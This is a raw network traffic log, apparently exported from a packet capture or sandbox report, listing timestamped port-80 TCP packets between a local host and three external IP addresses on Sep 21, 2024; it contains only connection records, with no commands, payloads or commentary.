                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582062960 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582067013 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582073927 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582092047 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582109928 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582228899 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582240105 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582251072 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582256079 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582273960 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582273006 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582284927 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582304001 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582304955 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582315922 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582329035 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582335949 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582343102 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582355976 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582360029 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582372904 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582375050 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582385063 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582395077 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582403898 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582406044 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582412958 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582425117 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582434893 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582436085 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582453012 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582458973 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582467079 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582479954 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582484961 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582490921 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582500935 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582514048 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582520008 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582530022 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582530975 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582535982 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582545996 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582546949 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582551956 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582556963 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582562923 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582567930 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582573891 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582573891 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582580090 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582586050 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582592010 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582631111 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582642078 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582658052 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582663059 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582675934 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582683086 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582686901 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582700014 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582700968 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582727909 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582745075 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582753897 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582781076 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582815886 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582827091 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582838058 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582849026 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582849979 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582865953 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582880974 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582925081 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582942963 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582967043 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582978010 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582978964 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.582990885 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583000898 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583003044 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583014965 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583030939 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583034992 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583046913 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583058119 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583061934 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583079100 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583081007 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583090067 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583100080 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583101988 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583120108 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583122015 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583132982 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583153009 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583153009 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583165884 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583168030 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583179951 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583192110 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583199978 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583204031 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583214045 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583237886 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583241940 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583250999 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583276987 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583302021 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583302975 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583314896 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583324909 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583345890 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583347082 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583359003 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583368063 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583375931 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583394051 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583404064 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583415985 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583421946 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583429098 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583452940 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583467960 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583841085 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583888054 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583892107 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583903074 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583925962 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583934069 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583944082 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583945036 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583956003 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583967924 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.583976984 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.584001064 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.584007978 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.584013939 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.584024906 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.584034920 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.584036112 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.584048033 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.584060907 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.584076881 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.584089041 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.584089041 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.584100962 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.584110022 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.584111929 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.584124088 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.584135056 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.584135056 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.584163904 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613104105 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613112926 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613125086 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613130093 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613141060 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613207102 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613219023 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613225937 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613246918 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613253117 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613261938 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613262892 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613267899 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613296032 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613325119 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613344908 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613351107 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613363028 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613368034 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613373995 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613392115 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613423109 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613486052 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613492012 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613502979 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613508940 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613514900 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613521099 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613533020 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613537073 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613555908 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.613573074 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614494085 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614523888 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614533901 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614571095 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614598989 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614604950 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614618063 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614622116 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614629030 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614645958 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614662886 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614691019 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614737034 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614743948 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614756107 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614762068 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614768028 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614782095 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614783049 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614789963 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614800930 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614806890 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614814043 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614814997 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614834070 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614850044 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.614886045 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615025043 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615030050 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615042925 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615089893 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615089893 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615089893 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615098000 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615109921 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615117073 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615134001 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615153074 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615173101 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615180016 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615190983 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615195990 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615226030 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615237951 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615408897 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615415096 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615426064 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615432978 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615464926 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615478039 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615524054 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615529060 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615540028 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615545034 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615554094 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615571022 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615571976 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615577936 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615590096 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615597010 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615607023 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615607977 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615616083 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615633011 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615649939 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615715981 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615721941 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615751028 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615756989 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615763903 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615768909 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615777016 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615794897 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615808964 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615844965 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615869045 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615880013 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615912914 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615951061 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615957975 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615968943 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.615976095 CEST8049713176.113.115.33192.168.2.9
